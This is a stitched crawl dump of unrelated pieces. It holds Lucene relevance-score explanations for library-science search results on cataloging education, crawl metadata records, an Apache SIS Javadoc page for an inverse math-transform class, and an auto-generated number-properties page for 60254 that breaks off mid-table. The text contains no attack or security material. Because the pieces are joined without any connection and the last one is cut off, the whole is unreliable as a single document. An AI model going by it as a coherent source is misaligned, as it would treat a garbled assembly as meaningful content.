of:\n1.0 = termFreq=1.0\n5.925452 = idf(docFreq=313, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.029400595 = weight(abstract_txt:library in 762) [ClassicSimilarity], result of:\n0.029400595 = score(doc=762,freq=2.0), product of:\n0.083543085 = queryWeight, product of:\n1.3748891 = boost\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.019076655 = queryNorm\n0.35192135 = fieldWeight in 762, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.10215982 = weight(abstract_txt:courses in 762) [ClassicSimilarity], result of:\n0.10215982 = score(doc=762,freq=1.0), product of:\n0.1916578 = queryWeight, product of:\n1.4725182 = boost\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.019076655 = queryNorm\n0.5330324 = fieldWeight in 762, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.119932204 = weight(abstract_txt:degrees in 762) [ClassicSimilarity], result of:\n0.119932204 = score(doc=762,freq=1.0), product of:\n0.21328662 = queryWeight, product of:\n1.5533855 = boost\n7.1975083 = idf(docFreq=87, maxDocs=43254)\n0.019076655 = queryNorm\n0.56230533 = fieldWeight in 762, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.1975083 = idf(docFreq=87, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.14710645 = weight(abstract_txt:curricula in 762) [ClassicSimilarity], result of:\n0.14710645 = score(doc=762,freq=1.0), product of:\n0.24439608 = queryWeight, product of:\n1.6628174 = boost\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.019076655 = queryNorm\n0.6019182 = fieldWeight in 762, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.03792717 = weight(abstract_txt:science in 762) [ClassicSimilarity], result of:\n0.03792717 = score(doc=762,freq=1.0), product of:\n0.124733575 = queryWeight, product of:\n1.67998 = boost\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.019076655 = queryNorm\n0.30406544 = fieldWeight in 762, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.08221436 = weight(abstract_txt:classification in 762) [ClassicSimilarity], result of:\n0.08221436 = score(doc=762,freq=4.0), product of:\n0.13161181 = queryWeight, product of:\n1.7256783 = boost\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.019076655 = queryNorm\n0.6246731 = fieldWeight in 762, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.2093117 = weight(abstract_txt:cataloging in 762) [ClassicSimilarity], result of:\n0.2093117 = score(doc=762,freq=7.0), product of:\n0.20363201 = queryWeight, product of:\n2.1465225 = boost\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.019076655 = queryNorm\n1.0278919 = fieldWeight in 762, product of:\n2.6457512 = tf(freq=7.0), with freq of:\n7.0 = termFreq=7.0\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.08756164 = weight(abstract_txt:education in 762) [ClassicSimilarity], result of:\n0.08756164 = score(doc=762,freq=1.0), product of:\n0.21788417 = queryWeight, product of:\n2.2203696 = boost\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.019076655 = queryNorm\n0.40187243 = fieldWeight in 762, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.44 = coord(11/25)\n```\n3. Haider, S.J.: Teaching of cataloging and classification in Pakistan (2006) 0.41\n```0.41312176 = sum of:\n0.41312176 = product of:\n1.1475604 = sum of:\n0.07498059 = weight(abstract_txt:contents in 1354) [ClassicSimilarity], result of:\n0.07498059 = score(doc=1354,freq=1.0), product of:\n0.13809718 = queryWeight, product of:\n1.249942 = boost\n5.7915225 = idf(docFreq=358, maxDocs=43254)\n0.019076655 = queryNorm\n0.5429552 = fieldWeight in 1354, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.7915225 = idf(docFreq=358, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.07541661 = weight(abstract_txt:teaching in 1354) [ClassicSimilarity], result of:\n0.07541661 = score(doc=1354,freq=1.0), product of:\n0.13863203 = queryWeight, product of:\n1.2523601 = boost\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.019076655 = queryNorm\n0.5440057 = fieldWeight in 1354, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.035280716 = weight(abstract_txt:library in 1354) [ClassicSimilarity], result of:\n0.035280716 = score(doc=1354,freq=2.0), product of:\n0.083543085 = queryWeight, product of:\n1.3748891 = boost\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.019076655 = queryNorm\n0.42230564 = fieldWeight in 1354, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.12259178 = weight(abstract_txt:courses in 1354) [ClassicSimilarity], result of:\n0.12259178 = score(doc=1354,freq=1.0), product of:\n0.1916578 = queryWeight, product of:\n1.4725182 = boost\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.019076655 = queryNorm\n0.6396389 = fieldWeight in 1354, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.24964795 = weight(abstract_txt:curricula in 1354) [ClassicSimilarity], result of:\n0.24964795 = score(doc=1354,freq=2.0), product of:\n0.24439608 = queryWeight, product of:\n1.6628174 = boost\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.019076655 = queryNorm\n1.0214891 = fieldWeight in 1354, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.08543967 = weight(abstract_txt:classification in 1354) [ClassicSimilarity], result of:\n0.08543967 = score(doc=1354,freq=3.0), product of:\n0.13161181 = queryWeight, product of:\n1.7256783 = boost\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.019076655 = queryNorm\n0.64917934 = fieldWeight in 1354, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.18986972 = weight(abstract_txt:cataloging in 1354) [ClassicSimilarity], result of:\n0.18986972 = score(doc=1354,freq=4.0), product of:\n0.20363201 = queryWeight, product of:\n2.1465225 = boost\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.019076655 = queryNorm\n0.93241584 = fieldWeight in 1354, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.14859703 = weight(abstract_txt:education in 1354) [ClassicSimilarity], result of:\n0.14859703 = score(doc=1354,freq=2.0), product of:\n0.21788417 = queryWeight, product of:\n2.2203696 = boost\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.019076655 = queryNorm\n0.68200016 = fieldWeight in 1354, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.16573629 = weight(abstract_txt:programs in 1354) [ClassicSimilarity], result of:\n0.16573629 = score(doc=1354,freq=1.0), product of:\n0.29523918 = queryWeight, product of:\n2.5846362 = boost\n5.9878697 = idf(docFreq=294, maxDocs=43254)\n0.019076655 = queryNorm\n0.5613628 = fieldWeight in 1354, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.9878697 = idf(docFreq=294, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.36 = coord(9/25)\n```\n4. Hady, M.F. Abdel; Shaker, A.K.: Cataloging and classification education in Egypt : stressing the fundamentals while approaching toward automated applications (2005) 0.33\n```0.33065537 = sum of:\n0.33065537 = product of:\n0.91848713 = sum of:\n0.033644173 = weight(abstract_txt:years in 1221) [ClassicSimilarity], result of:\n0.033644173 = score(doc=1221,freq=1.0), product of:\n0.09140003 = queryWeight, product of:\n1.0168821 = boost\n4.711655 = idf(docFreq=1056, maxDocs=43254)\n0.019076655 = queryNorm\n0.36809805 = fieldWeight in 1221, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.711655 = idf(docFreq=1056, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.059283555 = weight(abstract_txt:five in 1221) [ClassicSimilarity], result of:\n0.059283555 = score(doc=1221,freq=1.0), product of:\n0.13334066 = queryWeight, product of:\n1.2282273 = boost\n5.690909 = idf(docFreq=396, maxDocs=43254)\n0.019076655 = queryNorm\n0.44460225 = fieldWeight in 1221, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.690909 = idf(docFreq=396, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.029400595 = weight(abstract_txt:library in 1221) [ClassicSimilarity], result of:\n0.029400595 = score(doc=1221,freq=2.0), product of:\n0.083543085 = queryWeight, product of:\n1.3748891 = boost\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.019076655 = queryNorm\n0.35192135 = fieldWeight in 1221, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.1444758 = weight(abstract_txt:courses in 1221) [ClassicSimilarity], result of:\n0.1444758 = score(doc=1221,freq=2.0), product of:\n0.1916578 = queryWeight, product of:\n1.4725182 = boost\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.019076655 = queryNorm\n0.7538217 = fieldWeight in 1221, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.14710645 = weight(abstract_txt:curricula in 1221) [ClassicSimilarity], result of:\n0.14710645 = score(doc=1221,freq=1.0), product of:\n0.24439608 = queryWeight, product of:\n1.6628174 = boost\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.019076655 = queryNorm\n0.6019182 = fieldWeight in 1221, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.03792717 = weight(abstract_txt:science in 1221) [ClassicSimilarity], result of:\n0.03792717 = score(doc=1221,freq=1.0), product of:\n0.124733575 = queryWeight, product of:\n1.67998 = boost\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.019076655 = queryNorm\n0.30406544 = fieldWeight in 1221, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.08221436 = weight(abstract_txt:classification in 1221) [ClassicSimilarity], result of:\n0.08221436 = score(doc=1221,freq=4.0), product of:\n0.13161181 = queryWeight, product of:\n1.7256783 = boost\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.019076655 = queryNorm\n0.6246731 = fieldWeight in 1221, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.2093117 = weight(abstract_txt:cataloging in 1221) [ClassicSimilarity], result of:\n0.2093117 = score(doc=1221,freq=7.0), product of:\n0.20363201 = queryWeight, product of:\n2.1465225 = boost\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.019076655 = queryNorm\n1.0278919 = fieldWeight in 1221, product of:\n2.6457512 = tf(freq=7.0), with freq of:\n7.0 = termFreq=7.0\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.17512327 = weight(abstract_txt:education in 1221) [ClassicSimilarity], result of:\n0.17512327 = score(doc=1221,freq=4.0), product of:\n0.21788417 = queryWeight, product of:\n2.2203696 = boost\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.019076655 = queryNorm\n0.80374485 = fieldWeight in 1221, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.36 = coord(9/25)\n```\n```0.32367605 = sum of:\n0.32367605 = product of:\n0.89910007 = sum of:\n0.062847175 = weight(abstract_txt:teaching in 3445) [ClassicSimilarity], result of:\n0.062847175 = score(doc=3445,freq=1.0), product of:\n0.13863203 = queryWeight, product of:\n1.2523601 = boost\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.019076655 = queryNorm\n0.45333806 = fieldWeight in 3445, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.075985506 = weight(abstract_txt:analyzes in 3445) [ClassicSimilarity], result of:\n0.075985506 = score(doc=3445,freq=1.0), product of:\n0.15733558 = queryWeight, product of:\n1.3341691 = boost\n6.1817837 = idf(docFreq=242, maxDocs=43254)\n0.019076655 = queryNorm\n0.48295185 = fieldWeight in 3445, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.1817837 = idf(docFreq=242, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.029400595 = weight(abstract_txt:library in 3445) [ClassicSimilarity], result of:\n0.029400595 = score(doc=3445,freq=2.0), product of:\n0.083543085 = queryWeight, product of:\n1.3748891 = boost\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.019076655 = queryNorm\n0.35192135 = fieldWeight in 3445, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.176946 = weight(abstract_txt:courses in 3445) [ClassicSimilarity], result of:\n0.176946 = score(doc=3445,freq=3.0), product of:\n0.1916578 = queryWeight, product of:\n1.4725182 = boost\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.019076655 = queryNorm\n0.92323923 = fieldWeight in 3445, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.14710645 = weight(abstract_txt:curricula in 3445) [ClassicSimilarity], result of:\n0.14710645 = score(doc=3445,freq=1.0), product of:\n0.24439608 = queryWeight, product of:\n1.6628174 = boost\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.019076655 = queryNorm\n0.6019182 = fieldWeight in 3445, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.03792717 = weight(abstract_txt:science in 3445) [ClassicSimilarity], result of:\n0.03792717 = score(doc=3445,freq=1.0), product of:\n0.124733575 = queryWeight, product of:\n1.67998 = boost\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.019076655 = queryNorm\n0.30406544 = fieldWeight in 3445, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.07911239 = weight(abstract_txt:cataloging in 3445) [ClassicSimilarity], result of:\n0.07911239 = score(doc=3445,freq=1.0), product of:\n0.20363201 = queryWeight, product of:\n2.1465225 = boost\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.019076655 = queryNorm\n0.38850662 = fieldWeight in 3445, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.15166122 = weight(abstract_txt:education in 3445) [ClassicSimilarity], result of:\n0.15166122 = score(doc=3445,freq=3.0), product of:\n0.21788417 = queryWeight, product of:\n2.2203696 = boost\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.019076655 = queryNorm\n0.6960635 = fieldWeight in 3445, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.13811357 = weight(abstract_txt:programs in 3445) [ClassicSimilarity], result of:\n0.13811357 = score(doc=3445,freq=1.0), product of:\n0.29523918 = queryWeight, product of:\n2.5846362 = boost\n5.9878697 = idf(docFreq=294, maxDocs=43254)\n0.019076655 = queryNorm\n0.46780232 = fieldWeight in 3445, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.9878697 = idf(docFreq=294, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.36 = coord(9/25)\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6872541,"math_prob":0.99860543,"size":22566,"snap":"2021-31-2021-39","text_gpt3_token_len":8616,"char_repetition_ratio":0.25197235,"word_repetition_ratio":0.53538346,"special_character_ratio":0.53554016,"punctuation_ratio":0.28317901,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998996,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-27T12:44:21Z\",\"WARC-Record-ID\":\"<urn:uuid:3ba0fd09-3b18-4aff-8fa3-d2fe8f55d08e>\",\"Content-Length\":\"35229\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e344e375-2a66-4f53-92a6-975225d2fe2d>\",\"WARC-Concurrent-To\":\"<urn:uuid:2b33a368-f186-41a5-b07e-97f01d776983>\",\"WARC-IP-Address\":\"139.6.160.6\",\"WARC-Target-URI\":\"https://ixtrieve.fh-koeln.de/birds/litie/document/12614\",\"WARC-Payload-Digest\":\"sha1:DRIKFTYFD5L3OBXOXKNEKD3DESRBEESQ\",\"WARC-Block-Digest\":\"sha1:MTBMJVKSK7YSU6NV6VX73XFMMZJU6TR5\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780058450.44_warc_CC-MAIN-20210927120736-20210927150736-00499.warc.gz\"}"}
https://sis.apache.org/apidocs/org/apache/sis/referencing/operation/transform/AbstractMathTransform.Inverse.html
[ "# Class AbstractMathTransform.Inverse\n\nAll Implemented Interfaces:\n`Parameterized`, `Lenient­Comparable`, `Math­Transform`\nDirect Known Subclasses:\n`Abstract­Math­Transform1D​.Inverse`, `Abstract­Math­Transform2D​.Inverse`\nEnclosing class:\nAbstractMathTransform\n\nprotected abstract static class AbstractMathTransform.Inverse extends AbstractMathTransform\nBase class for implementations of inverse math transforms. Subclasses need to implement the `inverse()` method.\n\n## Serialization\n\nThis object may or may not be serializable, at implementation choices. Most Apache SIS implementations are serializable, but the serialized objects are not guaranteed to be compatible with future SIS versions. Serialization should be used only for short term storage or RMI between applications running the same SIS version.\nSince:\n0.5\n\nDefined in the `sis-referencing` module\n\n## Nested classes/interfaces inherited from class AbstractMathTransform\n\n`Abstract­Math­Transform​.Inverse`\n• ## Constructor Summary\n\nConstructors\nModifier\nConstructor\nDescription\n`protected `\n`Inverse()`\nConstructs an inverse math transform.\n• ## Method Summary\n\nModifier and Type\nMethod\nDescription\n`protected int`\n`compute­Hash­Code()`\nComputes a hash value for this transform.\n`Matrix`\n`derivative(Direct­Position point)`\nGets the derivative of this transform at a point.\n`boolean`\n```equals(Object object, Comparison­Mode mode)```\nCompares the specified object with this inverse math transform for equality.\n`protected String`\n`format­To(Formatter formatter)`\nFormats the inner part of a Well Known Text version 1 (WKT 1) element.\n`int`\n`get­Source­Dimensions()`\nGets the dimension of input points.\n`int`\n`get­Target­Dimensions()`\nGets the dimension of output points.\n`abstract Math­Transform`\n`inverse()`\nReturns the inverse of this math transform.\n`boolean`\n`is­Identity()`\nTests whether this transform does not move any points.\n\n### Methods inherited from class AbstractMathTransform\n\n`equals, get­Contextual­Parameters, get­Parameter­Descriptors, get­Parameter­Values, hash­Code, transform, transform, transform, transform, transform, transform, try­Concatenate`\n\n### Methods inherited from class FormattableObject\n\n`print, to­String, to­String, to­WKT`\n\n### Methods inherited from class Object\n\n`clone, finalize, get­Class, notify, notify­All, wait, wait, wait`\n\n### Methods inherited from interface MathTransform\n\n`to­WKT`\n• ## Constructor Details\n\n• ### Inverse\n\nprotected Inverse()\nConstructs an inverse math transform.\n• ## Method Details\n\n• ### getSourceDimensions\n\npublic int getSourceDimensions()\nGets the dimension of input points. The default implementation returns the dimension of output points of the inverse math transform.\nSpecified by:\n`get­Source­Dimensions` in interface `Math­Transform`\nSpecified by:\n`get­Source­Dimensions` in class `Abstract­Math­Transform`\nReturns:\nthe dimension of input points.\n• ### getTargetDimensions\n\npublic int getTargetDimensions()\nGets the dimension of output points. The default implementation returns the dimension of input points of the inverse math transform.\nSpecified by:\n`get­Target­Dimensions` in interface `Math­Transform`\nSpecified by:\n`get­Target­Dimensions` in class `Abstract­Math­Transform`\nReturns:\nthe dimension of output points.\n• ### derivative\n\npublic Matrix derivative(DirectPosition point) throws TransformException\nGets the derivative of this transform at a point. The default implementation computes the inverse of the matrix returned by the inverse math transform.\nSpecified by:\n`derivative` in interface `Math­Transform`\nOverrides:\n`derivative` in class `Abstract­Math­Transform`\nParameters:\n`point` - the coordinate point where to evaluate the derivative.\nReturns:\nthe derivative at the specified point (never `null`).\nThrows:\n`Null­Pointer­Exception` - if the derivative depends on coordinate and `point` is `null`.\n`Mismatched­Dimension­Exception` - if `point` does not have the expected dimension.\n`Transform­Exception` - if the derivative can not be evaluated at the specified point.\n• ### inverse\n\npublic abstract MathTransform inverse()\nReturns the inverse of this math transform. The returned transform should be the enclosing math transform.\nSpecified by:\n`inverse` in interface `Math­Transform`\nOverrides:\n`inverse` in class `Abstract­Math­Transform`\nReturns:\nthe inverse of this transform.\n• ### isIdentity\n\npublic boolean isIdentity()\nTests whether this transform does not move any points. The default implementation delegates this tests to the inverse math transform.\nSpecified by:\n`is­Identity` in interface `Math­Transform`\nOverrides:\n`is­Identity` in class `Abstract­Math­Transform`\nReturns:\n• ### computeHashCode\n\nprotected int computeHashCode()\nComputes a hash value for this transform. This method is invoked by `Abstract­Math­Transform​.hash­Code()` when first needed.\nOverrides:\n`compute­Hash­Code` in class `Abstract­Math­Transform`\nReturns:\nthe hash code value. This value may change between different execution of the Apache SIS library.\n• ### equals\n\npublic boolean equals(Object object, ComparisonMode mode)\nCompares the specified object with this inverse math transform for equality. The default implementation tests if `object` in an instance of the same class than `this`, and if so compares their inverse `Math­Transform`.\nSpecified by:\n`equals` in interface `Lenient­Comparable`\nOverrides:\n`equals` in class `Abstract­Math­Transform`\nParameters:\n`object` - the object to compare with this transform.\n`mode` - the strictness level of the comparison. Default to `STRICT`.\nReturns:\n`true` if the given object is considered equals to this math transform.\nFormats the inner part of a Well Known Text version 1 (WKT 1) element. If this inverse math transform has any parameter values, then this method formats the WKT as in the super-class method. Otherwise this method formats the math transform as an `\"Inverse_MT\"` entity.\nCompatibility note: `Param_MT` and `Inverse_MT` are defined in the WKT 1 specification only.\n`format­To` in class `Abstract­Math­Transform`\n`formatter` - the formatter to use.\nthe WKT element name, which is `\"Param_MT\"` or `\"Inverse_MT\"` in the default implementation." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.57643133,"math_prob":0.7457347,"size":5845,"snap":"2021-43-2021-49","text_gpt3_token_len":1194,"char_repetition_ratio":0.19568567,"word_repetition_ratio":0.13422818,"special_character_ratio":0.17040205,"punctuation_ratio":0.14472124,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96341956,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-06T16:52:37Z\",\"WARC-Record-ID\":\"<urn:uuid:6d8cbe56-1de1-4037-9daf-392178648016>\",\"Content-Length\":\"35135\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cadfa3c7-6aa5-49fb-b8af-f1d90027b623>\",\"WARC-Concurrent-To\":\"<urn:uuid:9b7feb55-5d8e-400a-a871-d6c38c2b6654>\",\"WARC-IP-Address\":\"151.101.2.132\",\"WARC-Target-URI\":\"https://sis.apache.org/apidocs/org/apache/sis/referencing/operation/transform/AbstractMathTransform.Inverse.html\",\"WARC-Payload-Digest\":\"sha1:4CSRVMMZ6CWGRRPDAJSXWEQNFA533RN2\",\"WARC-Block-Digest\":\"sha1:PHEAZ3FIWV7M5NPHPGNWRO7Q7FVXNHSB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363309.86_warc_CC-MAIN-20211206163944-20211206193944-00203.warc.gz\"}"}
https://metanumbers.com/60254
[ "# 60254 (number)\n\n60,254 (sixty thousand two hundred fifty-four) is an even five-digits composite number following 60253 and preceding 60255. In scientific notation, it is written as 6.0254 × 104. The sum of its digits is 17. It has a total of 3 prime factors and 8 positive divisors. There are 29,440 positive integers (up to 60254) that are relatively prime to 60254.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 5\n• Sum of Digits 17\n• Digital Root 8\n\n## Name\n\nShort name 60 thousand 254 sixty thousand two hundred fifty-four\n\n## Notation\n\nScientific notation 6.0254 × 104 60.254 × 103\n\n## Prime Factorization of 60254\n\nPrime Factorization 2 × 47 × 641\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 3 Total number of distinct prime factors Ω(n) 3 Total number of prime factors rad(n) 60254 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) -1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 60,254 is 2 × 47 × 641. Since it has a total of 3 prime factors, 60,254 is a composite number.\n\n## Divisors of 60254\n\n1, 2, 47, 94, 641, 1282, 30127, 60254\n\n8 divisors\n\n Even divisors 4 4 2 2\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 8 Total number of the positive divisors of n σ(n) 92448 Sum of all the positive divisors of n s(n) 32194 Sum of the proper positive divisors of n A(n) 11556 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 245.467 Returns the nth root of the product of n divisors H(n) 5.21409 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 60,254 can be divided by 8 positive divisors (out of which 4 are even, and 4 are odd). The sum of these divisors (counting 60,254) is 92,448, the average is 11,556.\n\n## Other Arithmetic Functions (n = 60254)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 29440 Total number of positive integers not greater than n that are coprime to n λ(n) 14720 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 6066 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 29,440 positive integers (less than 60,254) that are coprime with 60,254. And there are approximately 6,066 prime numbers less than or equal to 60,254.\n\n## Divisibility of 60254\n\n m n mod m 2 3 4 5 6 7 8 9 0 2 2 4 2 5 6 8\n\nThe number 60,254 is divisible by 2.\n\n• Arithmetic\n• Deficient\n\n• Polite\n\n• Square Free\n\n• Sphenic\n\n## Base conversion (60254)\n\nBase System Value\n2 Binary 1110101101011110\n3 Ternary 10001122122\n4 Quaternary 32231132\n5 Quinary 3412004\n6 Senary 1142542\n8 Octal 165536\n10 Decimal 60254\n12 Duodecimal 2aa52\n20 Vigesimal 7ace\n36 Base36 1ahq\n\n## Basic calculations (n = 60254)\n\n### Multiplication\n\nn×y\n n×2 120508 180762 241016 301270\n\n### Division\n\nn÷y\n n÷2 30127 20084.7 15063.5 12050.8\n\n### Exponentiation\n\nny\n n2 3630544516 218754829267064 13180853482657674256 794199145744055504621024\n\n### Nth Root\n\ny√n\n 2√n 245.467 39.2038 15.6674 9.03644\n\n## 60254 as geometric shapes\n\n### Circle\n\n Diameter 120508 378587 1.14057e+10\n\n### Sphere\n\n Volume 9.16318e+14 4.56228e+10 378587\n\n### Square\n\nLength = n\n Perimeter 241016 3.63054e+09 85212\n\n### Cube\n\nLength = n\n Surface area 2.17833e+10 2.18755e+14 104363\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 180762 1.57207e+09 52181.5\n\n### Triangular Pyramid\n\nLength = n\n Surface area 6.28829e+09 